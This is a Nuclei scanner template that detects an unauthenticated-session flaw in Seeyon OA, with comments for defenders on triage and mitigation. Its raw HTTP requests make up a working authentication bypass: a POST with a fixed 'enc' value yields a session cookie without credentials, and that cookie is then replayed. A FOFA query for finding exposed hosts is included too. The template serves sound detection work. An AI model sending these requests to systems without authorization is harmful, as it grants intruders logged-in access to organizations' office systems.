nuclei-templates/http/misconfiguration/seeyon-unauth.yaml

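# Detection template for an unauthenticated-session condition in Seeyon OA.
#
# Flow, as written below:
#   1. POST /seeyon/thirdpartyController.do with method=access and a fixed
#      `enc` value; no credentials are sent.
#   2. If the response headers carry a JSESSIONID cookie, the extractor stores
#      it in the internal variable `session`.
#   3. GET /seeyon/main.do replays that cookie.
# A finding is reported only when a response is 200 and its body holds both
# the "a user is already logged in" notice and the logout link, i.e. the
# server treated a session obtained without credentials as logged in.
#
# Triage notes for defenders:
#   - In web/proxy logs, look for POSTs to /seeyon/thirdpartyController.do
#     from unexpected sources, followed by requests that reuse the issued
#     JSESSIONID.
#   - Until the product is updated per vendor guidance, limit who can reach
#     that endpoint (reverse-proxy / WAF rule or network ACL).
id: seeyon-unauth

info:
  name: Seeyon Unauthorised Access
  author: pikpikcu
  severity: high
  description: Seeyon is vulnerable to unauthorised access.
  reference:
    - https://mp.weixin.qq.com/s/0AqdfTrZUVrwTMbKEKresg
    - https://github.com/chaitin/xray/blob/f90cf321bc4d294bbf6625a9c4853f3bfdf0a384/pocs/seeyon-oa-cookie-leak.yml
  metadata:
    # NOTE(review): `verified` describes the upstream revision; re-check it
    # against a test instance after editing the extractor or matchers.
    verified: true
    max-request: 2
    fofa-query: 'app="致远互联-OA"'
  tags: misconfig,seeyon,unauth

http:
  - raw:
      # Request 1: asks the third-party controller for a session. The empty
      # line separating headers from the form body is required in raw mode.
      - |
        POST /seeyon/thirdpartyController.do HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
        Content-Type: application/x-www-form-urlencoded
        Accept-Encoding: deflate

        method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4
      # Request 2: replays the extracted cookie against the main page.
      - |
        GET /seeyon/main.do HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
        Accept-Encoding: deflate
        Content-Type: application/x-www-form-urlencoded
        Cookie: {{session}}

    extractors:
      # internal: true keeps the cookie out of the scan output; it is only
      # used to fill {{session}} in request 2.
      - type: regex
        name: session
        part: header
        internal: true
        regex:
          # Stops at the first ';' or whitespace so that only
          # `JSESSIONID=<value>` is stored. The earlier `JSESSIONID=(.*)` ran
          # to the end of the header line, so cookie attributes after the
          # value (Path, HttpOnly, ...) would presumably have been replayed
          # in the Cookie header as well.
          - 'JSESSIONID=[^;\s]+'

    matchers-condition: and
    matchers:
      # Both strings must be present in the body (condition: and). The first
      # reads roughly "a user is already logged in; multiple users cannot log
      # in within the same window"; the second is the logout link that is
      # rendered for a logged-in session.
      - type: word
        part: body
        words:
          - "当前已登录了一个用户,同一窗口中不能登录多个用户"
          - "<a href='/seeyon/main.do?method=logout'"
        condition: and

      - type: status
        status:
          - 200
# NOTE(review): the digest below was issued for the upstream file contents.
# After any edit to this file it presumably no longer verifies, so the
# template has to be re-signed - confirm with your signing workflow.
# digest: 490a004630440220384115e0504e593434a9eef4e28d97eb846f81bda0bdc48ee25f6d8b05434c3d02205c389140d41be49f7a9f8c8afb1a8663f1fa42abcb901531dee793119b497e46:922c64590222798bb761d5b6d8e72950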